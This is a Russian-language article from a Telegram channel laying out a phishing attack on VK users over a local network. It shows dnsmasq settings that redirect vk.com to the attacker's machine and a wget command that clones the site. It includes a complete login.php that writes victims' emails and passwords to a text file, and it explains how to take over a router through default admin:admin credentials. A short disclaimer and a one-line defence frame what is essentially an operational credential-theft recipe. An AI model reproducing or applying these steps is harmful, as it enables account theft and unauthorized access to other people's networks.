Создание локального dns сервера + фейковый сайт

Статья написана для канала https://web.telegram.org/#/im?p=@cyber_communism

t.me/cyber_communism

Дисклеймер:

Статья не позывает к действиям, а лишь показывает дыру в безопасности, и как от неё обезопаситься. Ответственность за ваши действия я не несу

Фишинг - это выманивание пароля с помощью атак социальной инженерии. Сегодня рассмотрим одну из них

Что не так с этой страницей вк?...

На самом деле всё ок, кроме отсутствия https (зелёный замочек). Вряд ли кто то что то заподозрит. Но как так то?

Дело в том, что подменённый dns server преобразовал ваш запрос к вк . Как это устроить?

Натройка dns

Устанавливаем dnsmasq.

apt-get intall dnsmasq

Идём в файл конфигурации dnsmasq.conf (на многих ос он расположен в разных местах)

В конец допишите:

domain=com

interface=(ваш интерфейс wifi. Вероятнее всего wlan0)

no-hosts

address=/vk.com/192.168.1.55 (vk.com меняйте на сайт, который вас интересует)

Замените ip выше на ваш локальный (узнать можно из ifconfig)

На этом всё

Копирование сайта

Для начала нужно установить apache.

Я думаю нет смысла копипастить сюда убунту вики или арч вики, они объяснят лучше меня.

Установили? Дальше:

Полностью скопировать нам поможет утилита wget

Команда

wget -k -l 7 -p -E vk.com

Скопирует нам сайт в папку vk.com в месте, где открыта консоль

Файлы из этой папки копируем в папку http вашего apache.

Теперь открываем файл index.html

Ищем строки начинающиеся на <form method="post"...

И меняем action на "login.php"

После замены создаём сам login.php с тактм содержанием:

<?PHP

$Log = $_POST['email'];

$Pass = $_POST['pass'];

$log = fopen("database.txt", "at");

fwrite($log,"\n $Log:$Pass \n");

fclose($log);

echo "<html><head><META HTTP-EQUIV='Refresh' content ='0; URL = 192.168.1.55'></head></html>

Первые строки сохраняют полученные логин и пароль, а последняя перезагрузит страницу (вместо 192.168.1.55 очевидно надо писать свой ip)

Подмена dns на роутере

Заходим в 192.168.1.1 или 192.168.1.0 (веб интерфейс роутера). Редко кто меняет стандартные admin:admin. Ищем вкладку с dns. Обычно она расположена в вкладке "интернет"

Вставьте свой ip

На этом всё. Включаете apache, и ждёте пары login:password.

Как уберечь свою сеть:

СМЕНИТЕ admin:admin! И лучше вообще обрубить 80 порт на только проводное соединение. Ну тут уж как знаете

Больше интересного на @cyber_communism